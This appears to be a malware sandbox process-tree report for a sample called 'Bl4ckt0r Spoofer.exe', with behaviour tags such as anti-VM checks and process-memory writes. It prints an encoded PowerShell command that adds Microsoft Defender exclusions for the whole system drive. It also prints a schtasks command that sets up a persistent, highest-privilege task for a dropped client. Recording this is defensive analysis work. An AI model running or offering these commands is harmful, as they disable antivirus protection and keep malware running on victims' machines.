C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3372
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3444 -
C:\Users\Admin\AppData\Local\Temp\Bl4ckt0r Spoofer.exe"C:\Users\Admin\AppData\Local\Temp\Bl4ckt0r Spoofer.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAaQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdgBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAdgBkACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Spoofer.bat" "3⤵
- System Location Discovery: System Language Discovery
PID:3912 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4152
-
-
-
C:\Users\Admin\AppData\Local\Temp\x69M5tLLoveYOU (1) (1).exe"C:\Users\Admin\AppData\Local\Temp\x69M5tLLoveYOU (1) (1).exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1100
-
-
C:\Users\Admin\AppData\Local\Temp\x69s.exe"C:\Users\Admin\AppData\Local\Temp\x69s.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1940 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69XClient" /tr "C:\Users\Admin\AppData\Roaming\x69XClient.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:1408
-
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3272 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb6a36cc40,0x7ffb6a36cc4c,0x7ffb6a36cc583⤵PID:3544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1884 /prefetch:23⤵PID:1800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2176 /prefetch:33⤵
- Downloads MZ/PE file
PID:2824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2188 /prefetch:83⤵PID:4004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3132,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3148 /prefetch:13⤵PID:2416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3288 /prefetch:13⤵PID:4924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4576,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4604 /prefetch:13⤵PID:5272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4752 /prefetch:83⤵PID:5308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4740,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3688 /prefetch:83⤵PID:5384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4896,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5008 /prefetch:83⤵PID:5420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4916,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4980 /prefetch:83⤵PID:5656
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level3⤵
- Drops file in Program Files directory
PID:5836 -
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x264,0x268,0x26c,0x240,0x270,0x7ff6342a4698,0x7ff6342a46a4,0x7ff6342a46b04⤵
- Drops file in Program Files directory
PID:5980
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5040,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4756 /prefetch:83⤵PID:6080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5104 /prefetch:83⤵PID:5280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3672,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4968 /prefetch:83⤵PID:5172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5240,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4756 /prefetch:83⤵PID:5876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4880,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5216 /prefetch:23⤵PID:5932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4448,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4788 /prefetch:13⤵PID:5860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3216,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3204 /prefetch:13⤵PID:5388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5136,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4412 /prefetch:13⤵PID:5668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=4028,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5156 /prefetch:13⤵PID:5164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5616,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5608 /prefetch:13⤵PID:5704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5716,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3252 /prefetch:13⤵PID:212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=6044,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3284 /prefetch:13⤵PID:4680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=4040,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5956 /prefetch:13⤵PID:5472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=6096,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=6228 /prefetch:13⤵PID:6128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5600,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3292 /prefetch:13⤵PID:2464
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=3140,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3412 /prefetch:13⤵PID:2888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=5644,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=6392 /prefetch:13⤵PID:388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=6592,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=6608 /prefetch:13⤵PID:5364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=6588,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=6836 /prefetch:13⤵PID:5284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7280,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=7300 /prefetch:83⤵PID:2448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7276,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=7328 /prefetch:83⤵PID:5808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=7540,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=7624 /prefetch:13⤵PID:6036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=7784,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=7776 /prefetch:13⤵PID:4560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=7920,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=7924 /prefetch:13⤵PID:2968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=240,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=7444 /prefetch:83⤵PID:6236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=3336,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5008 /prefetch:13⤵PID:6404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=6252,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=7528 /prefetch:13⤵PID:6416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=3276,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=8184 /prefetch:13⤵PID:6476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=6304,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=6292 /prefetch:13⤵PID:6544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=7452,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=7488 /prefetch:13⤵PID:6604
-
-
C:\Users\Admin\Downloads\processhacker-2.39-setup.exe"C:\Users\Admin\Downloads\processhacker-2.39-setup.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6692 -
C:\Users\Admin\AppData\Local\Temp\is-R0B6H.tmp\processhacker-2.39-setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-R0B6H.tmp\processhacker-2.39-setup.tmp" /SL5="$70462,1874675,150016,C:\Users\Admin\Downloads\processhacker-2.39-setup.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4080 -
C:\Program Files\Process Hacker 2\ProcessHacker.exe"C:\Program Files\Process Hacker 2\ProcessHacker.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
- Suspicious behavior: GetForegroundWindowSpam
PID:8116
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=5352,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3332 /prefetch:13⤵PID:6836
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=7432,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4956 /prefetch:13⤵PID:6848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=8072,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=8096 /prefetch:13⤵PID:6856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=8104,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=8308 /prefetch:13⤵PID:6864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=8284,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=8432 /prefetch:13⤵PID:6872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=8408,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=8656 /prefetch:13⤵PID:6880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=8440,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=8680 /prefetch:13⤵PID:6888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=8556,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=8804 /prefetch:13⤵PID:6896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=8780,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=8936 /prefetch:13⤵PID:6904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=8916,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=9140 /prefetch:13⤵PID:6912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=8924,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=9260 /prefetch:13⤵PID:6920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=9132,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=9376 /prefetch:13⤵PID:6932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=9384,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=9508 /prefetch:13⤵PID:6940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=9728,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=9740 /prefetch:13⤵PID:6948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --field-trial-handle=10036,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=10160 /prefetch:13⤵PID:6720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=9764,i,12930405728415895814,10251746326941452627,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=6396 /prefetch:13⤵PID:7772
-
-
